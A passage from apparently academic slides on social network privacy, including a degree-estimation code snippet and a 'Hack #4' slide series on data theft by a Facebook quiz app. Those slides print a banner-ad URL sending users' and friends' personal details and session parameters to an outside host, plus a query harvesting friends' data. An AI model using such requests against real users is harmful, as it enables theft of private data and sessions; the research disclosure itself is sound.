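    avg = sum(len(nb) for nb in adj.values()) / len(adj)     # assumed known to the estimator
    est = estimate_degrees(public_listings(adj, K), K, avg)
    for v in ["hub", "c1", "c2", "c3", "leaf0"]:
        print(f"{v}: true {len(adj[v])}, estimated {est[v]:.2f}")
    print(f"mean relative error on sampled nodes: {mean_relative_error(est, adj):.2%}")
```

Three things hold whatever the sampling seed: the 40 leaves are recovered exactly because they published fewer than k friends, the estimates sum to the assumed total degree, and the hub comes out on top, since all 40 leaves list it while a prism node can be listed by at most three neighbours. The per-node error on the prism is where the slide's 38% comes from: the iteration redistributes the prism's total degree according to who happened to list whom.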
Page 115
Aggregate of x highest-degree nodes
Page 116
Approximable Functions
• Node Degree
• Dominating Set
• Betweenness Centrality
• Path Length
• Community Structure
Page 117
Conclusions
Social networking coming to dominate the web
Many old security lessons being re-learned
Social context changes fraud environment
Social graph challenging privacy requirements
Page 118
Hack #4: Application Data Theft
What happens when you take a quiz...
Page 119
Hack #4: Application Data Theft
Facebook Application Architecture
Page 120
Hack #4: Application Data Theft
URL for banner ad
http://sochr.com/i.php&name=[Joseph Bonneau]&nx=[My User ID]&age=[My DOB]&gender=[My Gender]&pic=[My Photo URL]&fname0=[Friend #1 Name 1]&fname1=[Friend #2 Name]&fname2=[Friend #3 Name]&fname3=[Friend #4 Name]&fpic0=[Friend #1 Photo URL]&fpic0=[Friend #2 Photo URL]&fpic0=[Friend #3 Photo URL]&fpic0=[Friend #4 Photo URL]&fb_session_params=[All of the quiz application's session parameters]
Page 121
Hack #4: Application Data Theft
Query made by banner ad through user's browser
select uid, birthday, current_location, sex, first_name, name, pic_square, relationship_status FROM user WHERE uid IN (select uid2 from friend where uid1 = ‘[current user id]‘) and strlen(pic) > 0 order by rand() limit 500
Page 122
Hack #4: Application Data Theft
What the user sees...
Page 123
My Reading List
• http://www.cl.cam.ac.uk/~jcb82/sns_bib/main.html
• Questions?